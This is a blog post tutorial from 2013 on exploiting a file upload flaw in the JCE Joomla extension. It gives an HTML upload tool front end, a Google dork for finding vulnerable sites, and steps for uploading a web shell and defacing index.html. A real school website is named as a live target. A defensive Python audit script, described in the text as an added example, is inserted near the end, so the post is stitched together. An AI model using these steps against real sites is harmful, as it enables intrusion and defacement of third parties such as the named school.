Monday, May 13, 2013

Exploit JCE Joomla Extension

Assalamualaikum. Sorry that I have rarely posted lately; I have a lot of schoolwork that I need to finish.
Without further ado, check this out!
First, copy the JCE file:
<html>
<head>
<title>JCE Joomla Extension Remote File Upload</title>
<link href="http://fonts.googleapis.com/css?family=Orbitron:700" rel="stylesheet" type="text/css">
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js" type="text/javascript"></script>
<style type="text/css">
body {
background:#e1e1e1;
font-family: orbitron;
padding:4;
width:98%;
background-color: #e1e1e1;
border: 1px solid #050505;
-webkit-border-radius: 6px 6px 6px 6px;
-moz-border-radius: 6px 6px 6px 6px;
border-radius: 6px 6px 6px 6px;
*zoom: 1;
-webkit-box-shadow: inset 0 1px 0 #ffffff;
-moz-box-shadow: inset 0 1px 0 #ffffff;
box-shadow: inset 0 1px 0 #ffffff;
}
#header {
color:#00FF00;
text-align:center;
text-shadow:1px 2px 3px #0000FF;
font-size:30px;
}
.tablenya{
}
.atas1 {
width:30%;
font-size:18px;
font-weight:bold;
background-color: #e1e1e1;
border: 1px solid #050505;
-webkit-border-radius: 6px 0 0 0;
-moz-border-radius: 6px 0 0 0;
border-radius: 6px 0 0 0;
*zoom: 1;
-webkit-box-shadow: inset 0 1px 0 #ffffff;
-moz-box-shadow: inset 0 1px 0 #ffffff;
box-shadow: inset 0 1px 0 #ffffff;
}
.atas2 {
width:50%;
font-size:18px;
font-weight:bold;
background-color: #e1e1e1;
border: 1px solid #050505;
-webkit-border-radius: 0 6px 0 0;
-moz-border-radius: 0 6px 0 0;
border-radius: 0 6px 0 0;
*zoom: 1;
-webkit-box-shadow: inset 0 1px 0 #ffffff;
-moz-box-shadow: inset 0 1px 0 #ffffff;
box-shadow: inset 0 1px 0 #ffffff;
color:#FF0000;
}
.tengah1 {
width:30%;
font-size:18px;
font-weight:bold;
background-color: #e1e1e1;
border: 1px solid #050505;
-webkit-border-radius: 0 0 0 0;
-moz-border-radius: 0 0 0 0;
border-radius: 0 0 0 0;
*zoom: 1;
-webkit-box-shadow: inset 0 1px 0 #ffffff;
-moz-box-shadow: inset 0 1px 0 #ffffff;
box-shadow: inset 0 1px 0 #ffffff;
}
.tengah2 {
width:50%;
font-size:18px;
font-weight:bold;
background-color: #e1e1e1;
border: 1px solid #050505;
-webkit-border-radius: 0 0 0 0;
-moz-border-radius: 0 0 0 0;
border-radius: 0 0 0 0;
*zoom: 1;
-webkit-box-shadow: inset 0 1px 0 #ffffff;
-moz-box-shadow: inset 0 1px 0 #ffffff;
box-shadow: inset 0 1px 0 #ffffff;
color:#FF0000;
}
.required {
text-align:right;
color:#FF0000;
position:fixed;
right:3%;
}
input {
font-size:18px;
font-weight:bold;
background-color: #e1e1e1;
border: 1px solid #050505;
-webkit-border-radius: 6px 6px 6px 6px;
-moz-border-radius: 6px 6px 6px 6px;
border-radius: 6px 6px 6px 6px;
*zoom: 1;
-webkit-box-shadow: inset 0 1px 0 #ffffff;
-moz-box-shadow: inset 0 1px 0 #ffffff;
box-shadow: inset 0 1px 0 #ffffff;
color:#FF0000;
}
.start {
text-align:center;
color:#FF0000;
}
#footer {
background-color: #e1e1e1;
border: 1px solid #050505;
-webkit-border-radius: 0 0 6px 6px;
-moz-border-radius: 0 0 6px 6px;
border-radius: 0 0 6px 6px;
*zoom: 1;
-webkit-box-shadow: inset 0 1px 0 #ffffff;
-moz-box-shadow: inset 0 1px 0 #ffffff;
box-shadow: inset 0 1px 0 #ffffff;
}
/*NoScript*/
#enjs {z-index: 999;position:fixed;top:0;left:0;width:100%;height:100%;background-color:#000;margin:0;padding:0;}
#enjs p {margin:0;padding:0;width:100%;color:#333;position:relative;top:40%;font:bold 18px/20px arial;text-align:center;text-shadow:none;}
/*ScrollBar */
::-webkit-scrollbar {width: 12px;}
::-webkit-scrollbar-track {background:rgb(71, 71, 71);}
::-webkit-scrollbar-thumb, ::-webkit-scrollbar-thumb:window-inactive { background: rgb(34, 34, 34); }

#loading-overlay {position:fixed;top:0;left:0;right:0;bottom:0;background:#000000;z-index:999999;text-align:center;width:100%;height:100%;padding-top:22%;color:#FF0000;}
.ball {background-color: transparent;border:5px solid rgb(240 ,0 , 0);border-right:5px solid transparent;border-left:5px solid transparent;border-radius:50px;box-shadow: 0 0 35px rgb(255 ,0 , 0);width:50px;height:50px;margin:0 auto;-moz-animation:spinPulse 1s infinite ease-in-out;-webkit-animation:spinPulse 1s infinite linear;}
.ball1 {background-color: transparent;border:5px solid rgb(240 ,0 , 0);border-left:5px solid transparent;border-right:5px solid transparent;border-radius:50px;box-shadow: 0 0 15px rgb(255 ,0 , 0);width:30px;height:30px;margin:0 auto;position:relative;top:-50px;-moz-animation:spinoffPulse 1s infinite linear;-webkit-animation:spinoffPulse 1s infinite linear;}
@-moz-keyframes spinPulse {0% { -moz-transform:rotate(160deg); opacity:0; box-shadow:0 0 1px rgb(255, 0, 0)}50% { -moz-transform:rotate(145deg); opacity:1; }100% { -moz-transform:rotate(-320deg); opacity:0; }}
@-moz-keyframes spinoffPulse {0% { -moz-transform:rotate(0deg); } 100% { -moz-transform:rotate(360deg); }}
@-webkit-keyframes spinPulse {0% { -webkit-transform:rotate(160deg); opacity:0; box-shadow:0 0 1px rgb(255, 0, 0)} 50% { -webkit-transform:rotate(145deg); opacity:1;} 100% { -webkit-transform:rotate(-320deg); opacity:0; }}
@-webkit-keyframes spinoffPulse {0% { -webkit-transform:rotate(0deg); } 100% { -webkit-transform:rotate(360deg); }}
</style>
</head>
<body>
<div id="header">-=[ JCE Joomla Extension Remote File Upload ]=-</div><br>
<form name="form1" action="" enctype="multipart/form-data" method="post">
<table class="tabelnya">
<tr>
  <td class="atas1">hostname (ex:www.sitename.com):</td>
<td class="atas2"><input name="host" size="90"> *</td>
</tr>
<tr>
<td class="tengah1">path (ex: /joomla/ or just / ):</td>
<td class="tengah2"><input name="path" size="90"> *</td>
 </tr>
<tr>
<td class="tengah1">Please specify a file to upload:</td>
<td class="tengah2"><input type="file" name="datafile" size="88"> *</td>
</tr>
<tr>
<td class="tengah1">specify a port (default is 80):</td>
    <td class="tengah2"><input name="port" size="90"></td>
</tr>
<tr>
<td class="tengah1">Proxy (ip:port):</td>
<td class="tengah2"><input name="proxy" size="90"></td>
</tr>
</table>
<div id="footer">
<div class="required">*fields are required</div>
    <br>
<div class="start"><input type="submit" value="Start" name="Submit"></div>
<br>
</div>
</form>
<div class="start">&copy 2013 ShadoWNamE</div>
<div id="loading-overlay">
<div class="ball"></div>
<div class="ball1"></div>
<h3>Loading..............</h3>
</div>
<script>
// remove the overlay with a .fadeOut() effect once the whole page has finished loading
$(window).bind("load", function() {
$("#loading-overlay").fadeOut();
});
</script>
</body></html>

Dork:
 inurl:index.php?option=com_jce
OK, on to the tutorial ^_^

1. Upload the PHP file to your shell / localhost

2. Enter the dork into Google

3. Lots of websites come up; try them one by one :D. Here, though, I already have a live target:
www.saintpatricktemuco.cl

4. Enter the site URL in "hostname (ex:www.sitename.com):"
    Example: www.saintpatricktemuco.cl (without http:// and /)

5. In Path: "path (ex: /joomla/ or just / ):"
Example: www.site.com/joomla/ (for the path you can use /joomla/, or if the website has no path, just use /)

6. Choose the shell you are going to upload

7. Click START!

8. Open the shell

9. Find the file "index.html" (without the quotes), click E / Edit

10. Insert your script, click Save

11. Then open the link http://www.saintpatricktemuco.cl/images/stories/index.html
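
For site owners, the steps above show where this upload ends up: inside the site's images/stories/ directory, which should contain only media. The audit below is an added example, not code from the original post; the media allow-list, the placeholder index.html bodies and the names audit_stories and build_sample_webroot are assumptions for illustration.

```python
import os
import tempfile

# Assumption: images/stories/ should hold only these media types.
MAGIC = {".jpg": (b"\xff\xd8\xff",), ".jpeg": (b"\xff\xd8\xff",),
         ".png": (b"\x89PNG\r\n\x1a\n",), ".gif": (b"GIF87a", b"GIF89a")}
# Assumption: placeholder index.html bodies of a clean install; confirm
# against your own known-good copy before relying on them.
CLEAN_INDEX = {b'<html><body bgcolor="#FFFFFF"></body></html>',
               b"<!DOCTYPE html><title></title>"}

def audit_stories(webroot):
    """Return sorted (relative_path, reason) findings under images/stories/."""
    findings = []
    for dirpath, _dirs, files in os.walk(os.path.join(webroot, "images", "stories")):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, webroot).replace(os.sep, "/")
            ext = os.path.splitext(name)[1].lower()
            with open(path, "rb") as fh:
                data = fh.read(1 << 20)  # first 1 MiB is enough for triage
            if name == "index.html":
                if data.strip() not in CLEAN_INDEX:
                    findings.append((rel, "index.html differs from placeholder"))
            elif ext not in MAGIC:
                findings.append((rel, "non-media file in upload directory"))
            elif not data.startswith(MAGIC[ext]):
                findings.append((rel, "extension does not match file signature"))
            elif b"<?php" in data.lower():
                findings.append((rel, "PHP tag inside media file"))
    return sorted(findings)

def build_sample_webroot():
    """Constructed sample tree (not real data) to exercise the audit."""
    root = tempfile.mkdtemp()
    stories = os.path.join(root, "images", "stories")
    os.makedirs(stories)
    samples = {
        "logo.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 16,         # clean image
        "photo.gif": b"GIF89a<?php /* constructed */ ?>",         # image with PHP tag
        "banner.jpg": b"<html>constructed</html>",                # wrong signature
        "x.php": b"<?php /* constructed placeholder */ ?>",       # script upload
        "index.html": b"<html>constructed replaced page</html>",  # edited page
    }
    for name, body in samples.items():
        with open(os.path.join(stories, name), "wb") as fh:
            fh.write(body)
    return root

if __name__ == "__main__":
    for rel, reason in audit_stories(build_sample_webroot()):
        print(f"{rel}: {reason}")
```

Run it against a copy of the webroot and compare any finding with a known-good backup before deleting anything, since a flagged file is also evidence of when the upload happened.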


That's all for my tutorial; apologies for any mistakes in my wording ... If we keep trying, anything is surely possible ^_^
Thank you, Wassalamualaikum Wr. Wb.

